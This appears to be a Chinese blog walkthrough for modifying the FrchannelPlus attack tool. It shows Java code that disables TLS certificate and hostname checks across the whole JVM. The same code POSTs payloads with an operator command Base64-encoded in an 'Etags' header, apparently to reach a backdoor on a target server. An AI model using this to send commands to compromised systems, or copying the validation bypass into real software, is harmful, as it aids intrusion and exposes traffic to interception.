执行命令显示 sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
下载工具源码 https://github.com/BambiZombie/FrchannelPlus
修改代码
在 attack 类中通过关闭 SSL 证书校验来消除上述报错(并没有修复证书链本身),修改 src/main/java/com/example/frchannel/attack.java 的代码如下
package com.example.frchannel;
import org.apache.http.HttpHost;
import org.apache.http.HttpResponse;
import org.apache.http.client.HttpClient;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.conn.ssl.NoopHostnameVerifier;
import org.apache.http.conn.ssl.SSLConnectionSocketFactory;
import org.apache.http.conn.ssl.TrustSelfSignedStrategy;
import org.apache.http.entity.ByteArrayEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClientBuilder;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.ssl.SSLContextBuilder;
import org.apache.http.util.EntityUtils;
import javax.net.ssl.*;
import java.security.cert.X509Certificate;
import java.util.Base64;
/**
 * HTTP sender: POSTs a caller-supplied byte payload to a URL and returns the response body as
 * text.
 *
 * <p>Security-relevant behaviour visible in this class:
 * <ul>
 *   <li>Loading the class replaces the JVM-wide default {@link SSLContext} and the
 *       {@link HttpsURLConnection} defaults with ones that accept any certificate and any
 *       hostname. Every later HTTPS connection in the same process that relies on those
 *       defaults is therefore unauthenticated, not only the requests made here.</li>
 *   <li>{@link #send} builds its own accept-everything client as well, so it does not depend on
 *       the global override.</li>
 * </ul>
 * With validation off, the peer's identity is never checked and an on-path party can read or
 * alter the traffic. If the only problem is a self-signed or privately issued server
 * certificate, loading that certificate into a dedicated trust store for this one client keeps
 * validation in place.
 */
public class attack {

    /**
     * {@link X509TrustManager} whose checks never throw, i.e. every client and server chain is
     * accepted.
     */
    private static final class AcceptAllTrustManager implements X509TrustManager {
        @Override
        public void checkClientTrusted(X509Certificate[] certs, String authType) {
            // Intentionally empty: returning normally means "trusted".
        }

        @Override
        public void checkServerTrusted(X509Certificate[] certs, String authType) {
            // Intentionally empty: returning normally means "trusted".
        }

        @Override
        public X509Certificate[] getAcceptedIssuers() {
            return new X509Certificate[0];
        }
    }

    // Executed once, when the class is initialised: turns TLS validation off process-wide.
    static {
        disableSSLVerification();
    }

    public attack() throws Exception {
    }

    /**
     * Installs an accept-everything TLS configuration as the process default.
     *
     * <p>Sets, in this order: the default socket factory and hostname verifier of
     * {@link HttpsURLConnection}, then the default {@link SSLContext}. Any exception is printed
     * and otherwise ignored, so a failure part-way leaves the earlier settings applied.
     */
    private static void disableSSLVerification() {
        try {
            TrustManager[] acceptAll = new TrustManager[] {new AcceptAllTrustManager()};

            SSLContext permissive = SSLContext.getInstance("TLS");
            permissive.init(null, acceptAll, new java.security.SecureRandom());

            HttpsURLConnection.setDefaultSSLSocketFactory(permissive.getSocketFactory());
            HttpsURLConnection.setDefaultHostnameVerifier(new HostnameVerifier() {
                @Override
                public boolean verify(String hostname, SSLSession session) {
                    // Any hostname is accepted, whatever the certificate says.
                    return true;
                }
            });

            // Libraries that fall back to SSLContext.getDefault() inherit the same behaviour.
            SSLContext.setDefault(permissive);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * POSTs {@code bytes} to {@code url} and returns the response body as a string.
     *
     * <p>The request is recognisable on the wire: a fixed Chrome 93 {@code User-Agent}, a
     * {@code Content-Type} of {@code gzip} (not a media type), and, when {@code cmd} is given,
     * a request header named {@code Etags} carrying the Base64 of {@code cmd}. The standard
     * header is {@code ETag} and it is a response header.
     *
     * @param url   target URL of the POST
     * @param bytes raw request body
     * @param cmd   optional text placed Base64-encoded in the {@code Etags} header; skipped when
     *              {@code null}. It is converted with the platform default charset.
     * @param proxy optional HTTP proxy; when {@code null} no proxy is set on the client
     * @return the response entity decoded by {@code EntityUtils.toString}
     * @throws Exception on any failure while building the client or executing the request
     */
    public static String send(String url, byte[] bytes, String cmd, HttpHost proxy) throws Exception {
        // Per-client TLS setup: the trust strategy answers "trusted" for every chain, and the
        // no-op verifier skips the hostname check. Used for every request, HTTP or HTTPS.
        SSLContext permissiveContext = SSLContextBuilder.create()
                .loadTrustMaterial((chain, authType) -> true)
                .build();

        HttpClientBuilder builder = HttpClients.custom();
        builder.setSSLContext(permissiveContext);
        builder.setSSLHostnameVerifier(NoopHostnameVerifier.INSTANCE);
        if (proxy != null) {
            builder.setProxy(proxy);
        }
        CloseableHttpClient client = builder.build();

        HttpPost request = new HttpPost(url);
        request.setEntity(new ByteArrayEntity(bytes));

        // 10 s for connect and for socket reads; the proxy is repeated at request level.
        RequestConfig.Builder requestSettings = RequestConfig.custom();
        requestSettings.setSocketTimeout(10000);
        requestSettings.setConnectTimeout(10000);
        requestSettings.setProxy(proxy);
        request.setConfig(requestSettings.build());

        request.setHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36");
        request.setHeader("Content-Type", "gzip");
        if (cmd != null) {
            String encodedCmd = Base64.getEncoder().encodeToString(cmd.getBytes());
            request.setHeader("Etags", encodedCmd);
        }

        try {
            HttpResponse reply = client.execute(request);
            return EntityUtils.toString(reply.getEntity());
        } finally {
            // Closing the client also releases the connection used for the response.
            client.close();
        }
    }
}
关键改进点:
- 全局SSL验证禁用(静态初始化块)
  - 在类加载时就禁用SSL验证
  - 同时设置了 HttpsURLConnection 和 SSLContext 的默认值(对整个 JVM 进程内的所有 HTTPS 连接生效)
- 简化HTTP客户端创建
  - 移除了HTTPS/HTTP的条件判断
  - 统一使用不验证证书的配置
打包为jar包
idea 配置
修改 pom.xml
添加 lib
配置 Artifacts
配置完成后通过 Build Artifacts 生成 jar 包
测试程序
运行打包后的程序,不再出现 PKIX 报错,可以正常访问;此时客户端不校验服务端证书和主机名,因此也无法发现链路上的中间人。